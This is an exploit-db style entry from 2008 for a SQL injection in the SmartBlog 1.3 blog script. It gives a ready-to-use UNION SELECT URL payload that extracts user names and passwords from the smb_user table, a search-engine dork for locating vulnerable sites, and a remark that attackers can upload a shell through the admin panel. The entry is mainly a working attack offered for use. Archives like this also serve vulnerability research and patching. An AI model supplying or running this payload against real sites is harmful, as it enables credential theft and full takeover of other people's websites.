Lucene search
His0k4EDB-ID:5535HistoryMay 03, 2008 - 12:00 a.m.
SmartBlog 1.3 - 'index.php' SQL Injection
2008-05-0300:00:00
His0k4
www.exploit-db.com
36
AI Score
7.4
Confidence
Low
###################################################
[~] Smartblog remote SQL injection exploit
[~] Script download : http://ftp1.toocharger.com/scfQ9NS/smartblog_3868.zip
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] Dork : ActionnΓΖΓΒ©e par smartblog
[~] P.O.C :
---------------------
http://localhost/[script_path]/index.php?idt={SQL}
[~] Exemple :
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
---------------------
[~] Note:
Admin http://localhost/[script_path]/?page=login.html
You can upload a shell from the admin panel
---------------------
###############################################
# milw0rm.com [2008-05-03]Related
cve
cve
prion
prion
Sql injection
2008-05-13 22:20:00
Directory traversal
2008-05-13 22:20:00
Sql injection
2008-05-13 22:20:00
nvd
nvd
cvelist
cvelist